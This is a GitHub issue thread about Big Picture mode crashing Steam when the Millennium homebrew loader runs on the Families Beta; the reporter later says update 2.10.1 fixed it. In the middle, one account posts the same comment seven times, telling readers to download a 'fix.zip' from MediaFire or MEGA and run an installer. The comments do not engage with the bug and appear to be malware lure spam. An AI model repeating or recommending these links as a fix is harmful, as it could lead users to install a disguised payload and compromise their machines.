### ISSUE TITLE
[Bug]Families Beta crashing big picture with millennium

### ISSUE THREAD

**Issue by Yecgaa01** [SteamClientHomebrew/Millennium#84]
### Before Reporting

- [X] I found no existing issues matching my bug
- [ ] My issue is not caused by the Millennium interface inside Steam (Themes, Plugins & Update Panel). If it is, make a issue report in [this repo](https://github.com/SteamClientHomebrew/Core).
- [X] My issue is not caused by a theme

### Describe the Bug

I try to open Big Picture, it loads and then crashes Steam completely.

### Expected Behavior

My troubleshooting tests:

First: I disabled the theme and it kept crashing. 
Second: I uninstalled and reinstalled Millennium and it still had the same problem. 
Third: I did a clean install of Steam and without installing anything I tried to open Big Picture. It worked. Fourth: I reinstalled Millennium and Big Picture started crashing again.

When I need Big Picture, i have to go to the Steam folder and delete User32.dll and python311.dll.

### Steps To Reproduce

Switch Steam to "Families Beta" version -install Millenium (I use space theme) - Try to open steam big picture mode - ???

### Operating System

Windows 11

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Yecgaa01** [comment]
Ok, the update 2.10.1 fixed the issue
